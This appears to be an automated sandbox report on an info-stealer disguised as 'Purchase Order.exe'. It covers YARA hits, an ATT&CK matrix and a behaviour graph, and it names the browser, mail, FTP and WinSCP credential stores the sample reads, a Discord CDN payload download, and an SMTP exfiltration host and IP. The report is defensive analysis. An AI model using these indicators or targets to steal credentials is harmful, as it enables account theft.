                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeQueries volume information: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeQueries volume information: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0.2.Purchase Order.exe.3adcb08.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Purchase Order.exe.3a8cae8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Purchase Order.exe.3a64ac8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Purchase Order.exe.3a8cae8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Purchase Order.exe.3adcb08.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000011.00000002.504132970.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.372147247.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.372093079.0000000003A4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.372017902.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.508094226.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Purchase Order.exe PID: 1800, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6644, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: Yara matchFile source: 00000011.00000002.508094226.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6644, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 0.2.Purchase Order.exe.3adcb08.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Purchase Order.exe.3a8cae8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Purchase Order.exe.3a64ac8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Purchase Order.exe.3a8cae8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Purchase Order.exe.3adcb08.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000011.00000002.504132970.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.372147247.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.372093079.0000000003A4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.372017902.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.508094226.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Purchase Order.exe PID: 1800, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6644, type: MEMORYSTR
                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts211
                    Windows Management Instrumentation
                    1
                    Registry Run Keys / Startup Folder
                    11
                    Process Injection
                    1
                    Disable or Modify Tools
                    2
                    OS Credential Dumping
                    1
                    File and Directory Discovery
                    Remote Services11
                    Archive Collected Data
                    Exfiltration Over Other Network Medium1
                    Ingress Tool Transfer
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    Registry Run Keys / Startup Folder
                    1
                    Deobfuscate/Decode Files or Information
                    1
                    Input Capture
                    114
                    System Information Discovery
                    Remote Desktop Protocol2
                    Data from Local System
                    Exfiltration Over Bluetooth11
                    Encrypted Channel
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
                    Obfuscated Files or Information
                    1
                    Credentials in Registry
                    1
                    Query Registry
                    SMB/Windows Admin Shares1
                    Email Collection
                    Automated Exfiltration1
                    Non-Standard Port
                    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
                    Software Packing
                    NTDS211
                    Security Software Discovery
                    Distributed Component Object Model1
                    Input Capture
                    Scheduled Transfer2
                    Non-Application Layer Protocol
                    SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    Timestomp
                    LSA Secrets1
                    Process Discovery
                    SSHKeyloggingData Transfer Size Limits13
                    Application Layer Protocol
                    Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common11
                    Masquerading
                    Cached Domain Credentials131
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items131
                    Virtualization/Sandbox Evasion
                    DCSync1
                    Application Window Discovery
                    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job11
                    Process Injection
                    Proc Filesystem1
                    Remote System Discovery
                    Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 618941 Sample: Purchase Order.exe Startdate: 02/05/2022 Architecture: WINDOWS Score: 100 47 mail.pilotgarage.com 2->47 67 Found malware configuration 2->67 69 Malicious sample detected (through community Yara rule) 2->69 71 Icon mismatch, binary includes an icon from a different legit application in order to fool users 2->71 73 8 other signatures 2->73 8 Purchase Order.exe 16 7 2->8         started        12 Puizg.exe 14 3 2->12         started        15 Puizg.exe 3 2->15         started        signatures3 process4 dnsIp5 49 cdn.discordapp.com 162.159.129.233, 443, 49760 CLOUDFLARENETUS United States 8->49 41 C:\Users\user\AppData\Roaming\...\Puizg.exe, PE32 8->41 dropped 43 C:\Users\user\...\Purchase Order.exe.log, ASCII 8->43 dropped 17 MSBuild.exe 2 8->17         started        21 MSBuild.exe 8->21         started        23 cmd.exe 1 8->23         started        51 162.159.130.233, 443, 49774, 49775 CLOUDFLARENETUS United States 12->51 75 Multi AV Scanner detection for dropped file 12->75 25 cmd.exe 12->25         started        53 192.168.2.1 unknown unknown 15->53 27 cmd.exe 15->27         started        file6 signatures7 process8 dnsIp9 45 mail.pilotgarage.com 5.250.241.50, 49771, 49791, 587 AYSIMATR Turkey 17->45 55 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->55 57 Tries to steal Mail credentials (via file / registry access) 17->57 59 Tries to harvest and steal ftp login credentials 17->59 61 Tries to harvest and steal browser information (history, passwords, etc) 17->61 63 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 21->63 65 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 21->65 29 conhost.exe 23->29         started        31 timeout.exe 1 23->31         started        33 conhost.exe 25->33         started        35 timeout.exe 25->35         started        37 conhost.exe 27->37         started        39 timeout.exe 27->39      